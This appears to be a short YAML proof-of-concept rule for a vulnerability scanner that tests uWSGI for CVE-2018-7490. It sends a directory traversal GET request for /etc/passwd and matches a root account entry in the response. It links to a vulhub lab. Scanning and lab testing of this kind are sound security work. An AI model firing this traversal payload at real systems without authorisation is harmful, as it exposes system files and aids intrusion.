name: poc-yaml-uwsgi-cve-2018-7490
rules:
  - method: GET
    path: /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
    follow_redirects: false
    expression: |
      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
  links:
    - https://github.com/vulhub/vulhub/tree/master/uwsgi/CVE-2018-7490